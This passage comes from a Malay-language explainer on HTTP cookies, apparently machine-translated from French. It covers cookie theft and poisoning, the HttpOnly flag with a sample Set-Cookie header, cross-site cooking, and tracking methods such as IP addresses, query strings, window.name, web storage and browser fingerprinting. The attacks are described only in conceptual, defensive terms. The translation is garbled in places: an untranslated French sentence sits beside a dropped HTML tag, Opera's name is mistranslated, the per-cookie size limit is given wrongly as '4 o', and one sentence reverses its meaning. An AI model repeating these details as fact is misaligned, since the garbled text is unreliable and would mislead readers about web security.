Serangan jenis ini sukar untuk dikesan pada bahagian pengguna kerana skrip berasal dari domain yang sama yang menetapkan kuki, dan operasi untuk menghantar nilai kelihatan dibenarkan oleh domain tersebut. Adalah dianggap sebagai tanggungjawab pentadbir yang mengendalikan laman web jenis ini untuk meletakkan sekatan yang menghalang penerbitan kod berniat jahat.

Kuki tidak boleh dilihat secara langsung kepada program pihak pelanggan seperti JavaScript jika ia dihantar dengan bendera HttpOnly. Dari sudut pandangan pelayan, satu-satunya perbezaan ialah dalam baris pengepala Set-Cookie terdapat medan baharu yang mengandungi rentetan HttpOnly ditambah:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Apabila penyemak imbas menerima kuki sedemikian, ia sepatutnya menggunakannya seperti biasa dalam pertukaran HTTP berikut, tetapi tanpa menjadikannya kelihatan kepada skrip yang dilaksanakan pada sisi klien. Bendera HttpOnly bukan sebahagian daripada sebarang spesifikasi teknikal rasmi dan tidak dilaksanakan dalam semua penyemak imbas. Ambil perhatian bahawa pada masa ini tiada cara untuk menghalang pembacaan dan penulisan kuki sesi dengan kaedah XMLHTTPRequest.

Pengubahsuaian kandungan: penyerang menghantar kuki yang tidak sah ke pelayan, mungkin dibuat daripada kuki yang sah yang dihantar oleh pelayan.

Menukar kuki

Sebaik sahaja kuki perlu disimpan dan dikembalikan tidak berubah kepada pelayan, penyerang boleh mengubah suai nilai kuki sebelum ia dihantar semula ke pelayan. Contohnya, jika kuki mengandungi jumlah nilai yang perlu dibayar oleh pengguna untuk item yang diletakkan dalam troli beli-belah kedai, menukar nilai ini mendedahkan pelayan kepada risiko mengecaj penyerang kurang daripada harga permulaan. Proses mengubah suai nilai kuki dipanggil keracunan biskut dan boleh digunakan selepas kecurian kuki untuk membuat serangan berterusan.

Dalam kaedah menimpa kuki, penyerang mengeksploitasi gangguan penyemak imbas untuk menghantar kuki yang tidak sah ke pelayan.

Kebanyakan tapak web, bagaimanapun, hanya menyimpan ID sesi — nombor unik yang dijana secara rawak yang digunakan untuk mengenal pasti pengguna sesi — dalam kuki itu sendiri, manakala semua maklumat lain disimpan pada pelayan. Dalam kes ini, masalah ini sebahagian besarnya diselesaikan.

Pengendalian kuki antara tapak web

Setiap tapak dijangka mempunyai kukinya sendiri, jadi satu tapak seharusnya tidak boleh mengubah suai atau mencipta kuki yang dikaitkan dengan tapak lain. Cacat keselamatan pelayar web boleh membenarkan tapak berniat jahat melanggar peraturan ini. Eksploitasi kecacatan sedemikian biasanya dirujuk sebagai masakan merentas tapak. Tujuan serangan sedemikian mungkin kecurian ID sesi.

Pengguna harus menggunakan versi terkini pelayar web di mana kelemahan ini hampir dihapuskan.

Keadaan bercanggah antara klien dan pelayan

Penggunaan kuki boleh menjana percanggahan antara keadaan pelanggan dan keadaan yang disimpan dalam kuki. Jika pengguna memperoleh kuki dan mengklik pada butang "Kembali" penyemak imbas, keadaan penyemak imbas secara amnya tidak sama seperti sebelum pemerolehan ini. Contohnya, jika bakul kedai dalam talian dibuat menggunakan kuki, kandungan bakul tidak boleh berubah apabila pengguna kembali ke sejarah penyemak imbas: jika pengguna menekan butang untuk menambah artikel dalam bakulnya dan mengklik pada "Kembali " butang, artikel kekal dalam yang ini. Ini mungkin bukan niat pengguna, yang pastinya mahu membatalkan penambahan artikel. Ini boleh menyebabkan ketidakpercayaan, kekeliruan dan pepijat. Jadi pembangun web harus menyedari masalah ini dan melaksanakan langkah-langkah untuk menangani situasi seperti ini.

Kuki tamat tempoh

Kuki berterusan telah dikritik oleh pakar keselamatan privasi kerana tidak ditetapkan untuk tamat tempoh tidak lama lagi, dengan itu membenarkan tapak web menjejak pengguna dan membina profil mereka dari semasa ke semasa. Aspek kuki ini juga merupakan sebahagian daripada masalah rampasan sesi, kerana kuki berterusan yang dicuri boleh digunakan untuk menyamar sebagai pengguna untuk tempoh masa yang agak lama.

Untuk membaca juga: GAFAM: siapa mereka? Mengapa mereka (kadang-kadang) begitu menakutkan?

Alternatif kepada kuki

Sesetengah operasi yang boleh dilakukan menggunakan kuki juga boleh dilakukan menggunakan mekanisme lain yang memintas kuki atau mencipta semula kuki yang dipadamkan, yang mewujudkan isu privasi dengan cara yang sama (atau kadangkala lebih teruk kerana kemudiannya tidak kelihatan) berbanding kuki.

Alamat IP

Pengguna boleh dijejaki dengan alamat IP komputer yang memanggil halaman tersebut. Teknik ini telah tersedia sejak pengenalan World Wide Web, apabila halaman dimuat turun pelayan meminta alamat IP komputer yang menjalankan pelayar atau proksi, jika tiada yang digunakan. Pelayan boleh menjejaki maklumat ini sama ada terdapat kuki yang sedang digunakan atau tidak. Walau bagaimanapun, alamat ini biasanya kurang dipercayai dalam mengenal pasti pengguna berbanding kuki kerana komputer dan proksi mungkin dikongsi oleh berbilang pengguna, dan komputer yang sama mungkin menerima alamat IP yang berbeza pada setiap sesi kerja (seperti c yang selalunya berlaku untuk sambungan telefon) .

Penjejakan melalui alamat IP boleh dipercayai dalam beberapa situasi, seperti sambungan jalur lebar yang mengekalkan alamat IP yang sama untuk masa yang lama, selagi kuasa dihidupkan.

Sesetengah sistem seperti Tor direka untuk mengekalkan ketaknamaan Internet dan menjadikan penjejakan melalui alamat IP mustahil atau tidak praktikal.

URL

Teknik yang lebih tepat adalah berdasarkan membenamkan maklumat dalam URL. Bahagian rentetan pertanyaan URL ialah satu teknik yang biasanya digunakan untuk tujuan ini, tetapi bahagian lain boleh digunakan juga. Kedua-dua serverlet Java dan mekanisme sesi PHP menggunakan kaedah ini jika kuki tidak didayakan.

Kaedah ini melibatkan pelayan web yang menambahkan permintaan rentetan pada pautan halaman web yang membawanya apabila ia dihantar ke penyemak imbas. Apabila pengguna mengikuti pautan, penyemak imbas mengembalikan rentetan pertanyaan yang dilampirkan kepada pelayan.

Rentetan pertanyaan yang digunakan untuk tujuan ini dan kuki adalah sangat serupa, kedua-duanya merupakan maklumat yang dipilih secara sewenang-wenang oleh pelayan dan dikembalikan oleh penyemak imbas. Walau bagaimanapun, terdapat beberapa perbezaan: apabila URL yang mengandungi rentetan pertanyaan digunakan semula, maklumat yang sama dihantar ke pelayan. Contohnya, jika pilihan pengguna dikodkan dalam rentetan pertanyaan URL dan pengguna menghantar URL tersebut kepada pengguna lain melalui e-mel, pengguna itu juga akan dapat menggunakan pilihan tersebut.

Sebaliknya, apabila pengguna mengakses halaman yang sama dua kali, tidak ada jaminan bahawa rentetan pertanyaan yang sama akan digunakan kedua-dua kali. Contohnya, jika pengguna mendarat di halaman dari halaman tapak dalaman pada kali pertama dan mendarat di halaman yang sama dari halaman luaran untuk kali kedua, rentetan pertanyaan berbanding halaman tapak biasanya berbeza, manakala kuki adalah sama. .

Kelemahan lain rentetan pertanyaan adalah berkaitan dengan keselamatan: menyimpan data yang mengenal pasti sesi dalam rentetan pertanyaan mendayakan atau memudahkan serangan penetapan sesi, serangan rujukan pengecam dan eksploitasi lain. Meluluskan ID sesi sebagai kuki HTTP adalah lebih selamat.

Medan borang tersembunyi

Satu bentuk penjejakan sesi, yang digunakan oleh ASP.NET, adalah menggunakan borang web dengan medan tersembunyi. Teknik ini sangat serupa dengan menggunakan rentetan pertanyaan URL untuk membawa maklumat dan mempunyai kelebihan dan kekurangan yang sama; dan jika borang diproses dengan kaedah HTTP GET, medan sebenarnya menjadi sebahagian daripada URL penyemak imbas yang akan menghantarnya semasa menyerahkan borang. Tetapi kebanyakan borang diproses dengan HTTP POST, yang menyebabkan maklumat borang, termasuk medan tersembunyi, ditambahkan sebagai input tambahan yang bukan sebahagian daripada URL mahupun kuki.

Pendekatan ini mempunyai dua kelebihan daripada perspektif penjejakan: pertama, menjejak maklumat yang diletakkan dalam kod sumber HTML dan input POST dan bukannya URL akan membolehkan pengguna biasa mengelakkan penjejakan ini; kedua, maklumat sesi tidak disalin apabila pengguna menyalin URL (untuk menyimpan halaman ke cakera atau menghantarnya melalui e-mel, contohnya).

tetingkap.nama

Semua pelayar web biasa boleh menyimpan sejumlah besar data (2MB hingga 32MB) melalui JavaScript menggunakan sifat window.name DOM. Data ini boleh digunakan sebagai ganti kuki sesi dan juga digunakan merentas domain. Teknik ini boleh digabungkan dengan objek JSON untuk menyimpan set kompleks pembolehubah sesi sisi klien.

Kelemahannya ialah setiap tetingkap atau tab yang berasingan pada mulanya akan mempunyai window.name kosong; apabila menyemak imbas mengikut tab (dibuka oleh pengguna) ini bermakna tab yang dibuka secara individu tidak akan mempunyai nama tetingkap. Selain itu window.name boleh digunakan untuk menjejak pelawat merentasi tapak berbeza yang boleh menimbulkan isu privasi.

Dalam beberapa aspek, ini boleh menjadi lebih selamat daripada kuki, disebabkan oleh tidak penglibatan pelayan, sekali gus menjadikannya kebal kepada serangan rangkaian kuki penghidu. Walau bagaimanapun, jika langkah khas diambil untuk melindungi data, ia terdedah kepada serangan selanjutnya, kerana data tersedia melalui tapak lain yang dibuka dalam tetingkap yang sama.

Pengesahan HTTP

Protokol HTTP termasuk protokol pengesahan akses asas dan ringkasan pengesahan akses, yang membenarkan akses kepada halaman web hanya apabila pengguna telah memberikan nama pengguna dan kata laluan. Jika pelayan meminta sijil untuk memberikan akses kepada halaman web, penyemak imbas memintanya daripada pengguna dan setelah diperoleh, penyemak imbas menyimpannya dan menghantarnya dalam semua permintaan HTTP berikutnya. Maklumat ini boleh digunakan untuk menjejaki pengguna.

Objek kongsi tempatan

Jika pelayar menyertakan pemalam Adobe Flash Player, pemalam objek kongsi tempatan boleh digunakan untuk tujuan yang sama seperti kuki. Mereka boleh menjadi pilihan yang menarik untuk pembangun web kerana:

• had saiz lalai untuk objek kongsi tempatan ialah 100 KB;
• semakan keselamatan adalah berasingan daripada semakan kuki pengguna (jadi objek kongsi tempatan boleh dibenarkan apabila kuki tidak).

Perkara terakhir ini, yang membezakan dasar pengurusan kuki daripada objek kongsi tempatan Adobe menimbulkan persoalan berkenaan pengurusan oleh pengguna tetapan privasinya: dia mesti sedar bahawa pengurusan kukinya tidak mempunyai kesan ke atas pengurusan objek kongsi tempatan, dan begitu juga sebaliknya.

Satu lagi kritikan terhadap sistem ini ialah ia hanya boleh digunakan melalui pemalam Adobe Flash Player yang bersifat proprietari dan bukan standard web.

Kegigihan pihak pelanggan

Sesetengah pelayar web menyokong mekanisme kegigihan berasaskan skrip, yang membenarkan halaman menyimpan maklumat secara setempat untuk kegunaan kemudian. Internet Explorer, sebagai contoh, menyokong maklumat berterusan dalam sejarah penyemak imbas, penanda halaman, dalam format yang disimpan dalam XML atau terus dengan halaman web yang disimpan ke cakera. Untuk Microsoft Internet Explorer 5, terdapat kaedah data pengguna yang tersedia melalui gelagat DHTML.

W3C memperkenalkan dalam HTML 5 API JavaScript baharu untuk storan data sebelah pelanggan yang dipanggil storan Web dan bertujuan untuk menggantikan kuki secara kekal. Ia serupa dengan kuki tetapi dengan kapasiti yang lebih baik dan tanpa menyimpan maklumat dalam pengepala permintaan HTTP. API membenarkan dua jenis storan web: storan setempat dan storan sesi, serupa dengan kuki berterusan dan kuki sesi (kecuali kuki sesi tamat tempoh apabila penyemak imbas ditutup semasa storan sesi tamat tempoh apabila tab ditutup), masing-masing. Storan web disokong oleh Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 dan Opera 10.50.

Mekanisme yang berbeza biasanya bergantung pada caching penyemak imbas (dalam memori dan bukannya muat semula) menggunakan program JavaScript dalam halaman web. 

Sebagai contoh, halaman boleh mengandungi teg . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Pada ketika ini, atur cara kekal dalam memori cache dan halaman yang dilawati tidak dimuatkan semula untuk kali kedua. Akibatnya, jika atur cara mengandungi pembolehubah global (contohnya var id = 3243242;), pengecam ini kekal sah dan boleh dieksploitasi oleh kod JavaScript lain setelah halaman dimuatkan semula atau setelah halaman yang memautkan program dimuatkan. 

Kelemahan utama kaedah ini ialah pembolehubah global JavaScript mestilah statik, bermakna ia tidak boleh diubah atau dipadamkan seperti kuki.

cap jari pelayar web

Cap jari penyemak imbas ialah maklumat yang dikumpul tentang tetapan konfigurasi penyemak imbas untuk tujuan pengenalan. Cap jari ini boleh digunakan untuk mengenal pasti sepenuhnya atau sebahagian pengguna Internet atau peranti walaupun kuki dilumpuhkan.

Maklumat asas konfigurasi pelayar web telah lama dikumpulkan oleh perkhidmatan khalayak tapak web untuk tujuan mengukur trafik web manusia dengan tepat dan mengesan pelbagai bentuk penipuan klik. Dengan bantuan bahasa skrip sebelah pelanggan, pengumpulan maklumat yang lebih tepat adalah sekarang mungkin.

Menukar maklumat ini kepada rentetan bit menghasilkan cap jari peranti. Pada tahun 2010, Electronic Frontier Foundation (EFF) mengukur entropi cap jari pelayar sekurang-kurangnya 18,1 bit, dan itu sebelum kemajuan dalam cap jari kanvas menambah 5,7 bit pada entropi itu.

Biskut secara ringkas

Kuki ialah fail teks kecil yang disimpan oleh pelayar web pada pemacu keras pelawat tapak web dan yang digunakan (antara lain) untuk merekod maklumat tentang pelawat atau perjalanan mereka melalui tapak. Oleh itu, juruweb boleh mengenali tabiat pelawat dan memperibadikan persembahan tapaknya untuk setiap pelawat; kuki kemudian memungkinkan untuk mengingati berapa banyak artikel untuk dipaparkan pada halaman utama atau bahkan untuk mengekalkan bukti kelayakan log masuk untuk mana-mana pihak persendirian: apabila pelawat kembali ke tapak, ia tidak lagi perlu menaip nama dan kata laluannya untuk dikenali, kerana ia dibaca secara automatik dalam kuki.

Kuki mempunyai jangka hayat yang terhad, ditetapkan oleh pereka bentuk tapak. Mereka juga boleh tamat tempoh pada penghujung sesi di tapak, yang sepadan dengan penutupan penyemak imbas. Kuki digunakan secara meluas untuk memudahkan pelawat dan memberikan maklumat yang lebih relevan. Tetapi teknik khas membolehkan untuk mengikuti pelawat di beberapa tapak dan dengan itu untuk mengumpul dan menyemak silang maklumat yang sangat luas tentang tabiatnya. Kaedah ini telah memberikan penggunaan kuki reputasi sebagai teknik pengawasan yang melanggar privasi pelawat, yang malangnya sepadan dengan realiti dalam banyak kes penggunaan atas sebab bukan teknikal atau tidak menghormati jangkaan pengguna. .

Sebagai tindak balas kepada ketakutan yang sah ini, HTML 5 memperkenalkan API JavaScript baharu untuk storan data sebelah pelanggan yang dipanggil storan Web, yang jauh lebih selamat dan dengan kapasiti yang lebih besar, yang bertujuan untuk menggantikan kuki.

Penyimpanan kuki

Dengan sesetengah penyemak imbas, kuki boleh diedit dengan mudah, editor teks ringkas seperti Notepad sudah cukup untuk menukar nilainya secara manual.

Kuki disimpan secara berbeza bergantung pada penyemak imbas:

• Microsoft Internet Explorer menyimpan setiap kuki dalam fail yang berbeza;
• Mozilla Firefox menyimpan semua kukinya dalam satu fail;
• beroperasi menyimpan semua kukinya dalam satu fail dan menyulitkannya (mustahil untuk mengubah suainya kecuali dalam pilihan perisian);
• Apple Safari menyimpan semua kukinya dalam satu fail sambungan .plist. Pengubahsuaian boleh dilakukan tetapi tidak begitu mudah, melainkan anda melalui pilihan perisian.

Pelayar diperlukan untuk menyokong sekurang-kurangnya :

• 300 kuki serentak;
• 4 o setiap kuki;
• 20 kuki setiap hos atau domain.